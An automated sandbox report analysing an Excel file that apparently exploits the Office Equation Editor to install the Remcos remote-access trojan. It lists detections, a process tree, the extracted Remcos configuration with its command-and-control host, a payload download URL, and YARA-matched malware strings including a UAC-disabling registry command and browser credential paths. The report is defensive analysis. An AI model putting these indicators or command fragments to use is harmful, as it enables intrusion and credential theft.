Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
202404294766578200.xlam.xlsx

Overview

General Information

Sample name:202404294766578200.xlam.xlsx
Analysis ID:1436298
MD5:17ed5ea9a21f03fbc7ded60afb7fa7ec
SHA1:aa15371cc8f6b7da3e84aae222916ad8089cd747
SHA256:8077345137e6ba83060605d6da78f97319552675bd79dd0ddf1beb0680b19899
Tags:AgentTeslaxlamxlsx
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2592 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 1012 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • CKK.exe (PID: 3052 cmdline: "C:\Users\user\AppData\Roaming\CKK.exe" MD5: FA3641C75D2BEB68C01E8065EEFC4707)
        • deblaterate.exe (PID: 2008 cmdline: "C:\Users\user\AppData\Roaming\CKK.exe" MD5: B0D8802F1660EDEC8682E3081795E3F1)
          • svchost.exe (PID: 1812 cmdline: "C:\Users\user\AppData\Roaming\CKK.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
            • svchost.exe (PID: 1592 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj" MD5: 54A47F6B5E09A77E61649109C6A08866)
            • svchost.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\sjtmzkcptmljfowfsvrxbqbvspfxg" MD5: 54A47F6B5E09A77E61649109C6A08866)
            • svchost.exe (PID: 1460 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\cmzeadnjpudohckjjfeyevvebepghjumz" MD5: 54A47F6B5E09A77E61649109C6A08866)
  • wscript.exe (PID: 1864 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • deblaterate.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" MD5: B0D8802F1660EDEC8682E3081795E3F1)
      • svchost.exe (PID: 920 cmdline: "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x24c3:$s1: <legacyDrawing r:id="
  • 0x24eb:$s2: <oleObject progId="
  • 0x2539:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x6c4a8:$a1: Remcos restarted by watchdog!
      • 0x6ca20:$a3: %02i:%02i:%02i:%03i
      00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x6656c:$str_b2: Executing file:
      • 0x675ec:$str_b3: GetDirectListeningPort
      • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x67118:$str_b7: \update.vbs
      • 0x66594:$str_b9: Downloaded file:
      • 0x66580:$str_b10: Downloading file:
      • 0x66624:$str_b12: Failed to upload file:
      • 0x675b4:$str_b13: StartForward
      • 0x675d4:$str_b14: StopForward
      • 0x67070:$str_b15: fso.DeleteFile "
      • 0x67004:$str_b16: On Error Resume Next
      • 0x670a0:$str_b17: fso.DeleteFolder "
      • 0x66614:$str_b18: Uploaded file:
      • 0x665d4:$str_b19: Unable to delete:
      • 0x67038:$str_b20: while fso.FileExists("
      • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
      00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6637c:$s1: CoGetObject
      • 0x66390:$s1: CoGetObject
      • 0x663ac:$s1: CoGetObject
      • 0x70338:$s1: CoGetObject
      • 0x6633c:$s2: Elevation:Administrator!new:
      Click to see the 29 entries
      SourceRuleDescriptionAuthorStrings
      6.2.deblaterate.exe.720000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
        6.2.deblaterate.exe.720000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          6.2.deblaterate.exe.720000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6aaa8:$a1: Remcos restarted by watchdog!
          • 0x6b020:$a3: %02i:%02i:%02i:%03i
          6.2.deblaterate.exe.720000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
          • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
          • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x64b6c:$str_b2: Executing file:
          • 0x65bec:$str_b3: GetDirectListeningPort
          • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x65718:$str_b7: \update.vbs
          • 0x64b94:$str_b9: Downloaded file:
          • 0x64b80:$str_b10: Downloading file:
          • 0x64c24:$str_b12: Failed to upload file:
          • 0x65bb4:$str_b13: StartForward
          • 0x65bd4:$str_b14: StopForward
          • 0x65670:$str_b15: fso.DeleteFile "
          • 0x65604:$str_b16: On Error Resume Next
          • 0x656a0:$str_b17: fso.DeleteFolder "
          • 0x64c14:$str_b18: Uploaded file:
          • 0x64bd4:$str_b19: Unable to delete:
          • 0x65638:$str_b20: while fso.FileExists("
          • 0x650b1:$str_c0: [Firefox StoredLogins not found]
          6.2.deblaterate.exe.720000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
          • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x6497c:$s1: CoGetObject
          • 0x64990:$s1: CoGetObject
          • 0x649ac:$s1: CoGetObject
          • 0x6e938:$s1: CoGetObject
          • 0x6493c:$s2: Elevation:Administrator!new:
          Click to see the 35 entries

          Exploits

          barindex
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.94.54.101, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1012, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1012, TargetFilename: C:\Users\user\AppData\Roaming\CKK.exe

          System Summary

          barindex
          Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1012, Protocol: tcp, SourceIp: 23.94.54.101, SourceIsIpv6: false, SourcePort: 80
          Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CKK.exe, NewProcessName: C:\Users\user\AppData\Roaming\CKK.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CKK.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1012, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 3052, ProcessName: CKK.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CKK.exe, NewProcessName: C:\Users\user\AppData\Roaming\CKK.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CKK.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1012, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 3052, ProcessName: CKK.exe
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 1864, ProcessName: wscript.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ParentImage: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ParentProcessId: 2008, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 1812, ProcessName: svchost.exe
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 1864, ProcessName: wscript.exe
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1812, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ParentImage: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ParentProcessId: 2008, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 1812, ProcessName: svchost.exe

          Data Obfuscation

          barindex
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ProcessId: 2008, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

          Stealing of Sensitive Information

          barindex
          Source: Registry Key setAuthor: Joe Security: Data: Details: FD 44 4B 36 AE 9C E0 16 26 19 F5 A2 D6 C2 5C 1C 3F 2E 1E 22 74 EF 03 FE 4E CA 0A C8 28 C8 02 76 CE D4 34 45 AE BE CC E8 6F 0D CB 89 C3 D6 7F 35 0B 71 0A 11 71 35 61 80 1D 1C F9 6D 0A C2 5C 62 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1812, TargetObject: HKEY_CURRENT_USER\Software\Rmc-E70NOS\exepath
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 202404294766578200.xlam.xlsxAvira: detected
          Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
          Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
          Source: http://23.94.54.101/GVV.exeAvira URL Cloud: Label: malware
          Source: 7.2.svchost.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
          Source: http://23.94.54.101/GVV.exeVirustotal: Detection: 15%Perma Link
          Source: C:\Users\user\AppData\Roaming\CKK.exeReversingLabs: Detection: 75%
          Source: C:\Users\user\AppData\Roaming\CKK.exeVirustotal: Detection: 64%Perma Link
          Source: 202404294766578200.xlam.xlsxReversingLabs: Detection: 68%
          Source: 202404294766578200.xlam.xlsxVirustotal: Detection: 59%Perma Link
          Source: Yara matchFile source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\CKK.exeJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,7_2_00433837
          Source: deblaterate.exe, 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_ac7aaa67-d

          Exploits

          barindex
          Source: Yara matchFile source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 23.94.54.101 Port: 80Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CKK.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CKK.exeJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

          Privilege Escalation

          barindex
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004074FD _wcslen,CoGetObject,7_2_004074FD
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: deblaterate.exe, 00000006.00000003.800399276.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000006.00000003.800711700.0000000002C30000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.828579271.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.828375124.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_00A5DBBE
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A2C2A2 FindFirstFileExW,3_2_00A2C2A2
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A668EE FindFirstFileW,FindClose,3_2_00A668EE
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_00A6698F
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00A5D076
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00A5D3A9
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00A69642
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00A6979D
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00A69B2B
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A65C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00A65C97
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_00DADBBE
